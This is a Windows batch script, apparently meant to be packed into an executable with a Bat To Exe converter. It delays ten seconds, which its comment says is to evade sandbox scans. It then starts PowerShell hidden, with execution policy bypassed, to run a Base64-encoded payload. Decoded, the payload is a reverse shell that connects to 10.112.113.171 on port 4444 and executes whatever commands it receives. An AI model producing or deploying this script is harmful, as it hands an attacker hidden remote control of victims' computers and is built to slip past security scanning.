::[Bat To Exe Converter]
::
::fBE1pAF6MU+EWHreyHcjLQlHcDaDPmmzEok45//14+WGpl4hfc8YR9eDi+bAKOUa6SU=
::YAwzoRdxOk+EWAjk
::fBw5plQjdCyDJGyX8VAjFClVTgaLKFeeCaIS5Of66/m7pkIKWu4weYuV07eBQA==
::YAwzuBVtJxjWCl3EqQJgSA==
::ZR4luwNxJguZRRnk
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSzk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpCI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAnk
::YxY4rhs+aU+IeA==
::cxY6rQJ7JhzQF1fEqQJhZko0
::ZQ05rAF9IBncCkqN+0xwdVsFAlXi
::ZQ05rAF9IAHYFVzEqQIXOhpaeAyHOn+bE6ETvog=
::eg0/rx1wNQPfEVWB+kM9LVsJDDaNP2CpErQOqM/64u+Uwg==
::fBEirQZwNQPfEVWB+kM9LVsJDDaNP2CpErQOqM/64u+Uwg==
::cRolqwZ3JBvQF1fEqQICJxhfXxCDLiudB7gZ+4g=
::dhA7uBVwLU+EWGuL90kjPBpGDCODMW6pZg==
::YQ03rBFzNR3SWATExk0zIwhATRbCG2q3A6Z8
::dhAmsQZ3MwfNWATExk0zIwhATRbCG2q3A6Z8
::ZQ0/vhVqMQ3MEVWAtB9wGhRXRxeWPXn6IbQR7fub
::Zg8zqx1/OA3MEVWAtB9wGhRXRxeWPXn6IbQR7fub
::dhA7pRFwIByZRRm2+0E7Ow9VXkSlPWa/FdU=
::Zh4grVQjdCyDJGyX8VAjFClVTgaLKFeeCaIS5Of66/m7hV8cWuYLcIrdzpWbNO9d713hFQ==
::YB416Ek+ZW8=
::
::
::978f952a14a936cc963da21a135fa983
@echo off
:: Wait 10 seconds to bypass quick sandbox scans
timeout /t 10 /nobreak > nul

:: Paste your Base64 string below
set "payload=JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAxADAALgAxADEAMgAuADEAMQAzAC4AMQA3ADEAIgAsADQANAA0ADQAKQA7ACQAcwA9ACQAYwAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7ACQAdwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwApADsAJAB3AC4AQQB1AHQAbwBGAGwAdQBzAGgAPQAkAHQAcgB1AGUAOwAkAHIAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAHMAKQA7AHcAaABpAGwAZQAoACQAYwAuAEMAbwBuAG4AZQBjAHQAZQBkACkAewAkAGkAbgA9ACQAcgAuAFIAZQBhAGQATABpAG4AZQAoACkAOwBpAGYAKAAkAGkAbgAgAC0AZQBxACAAIgBlAHgAaQB0ACIAKQB7AGIAcgBlAGEAawB9ADsAJABvAHUAdAA9AGkAZQB4ACAAJABpAG4AIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwAkAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACQAbwB1AHQAKQB9AA=="

:: Start hidden and bypass execution policy
start /b powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand %payload%
exit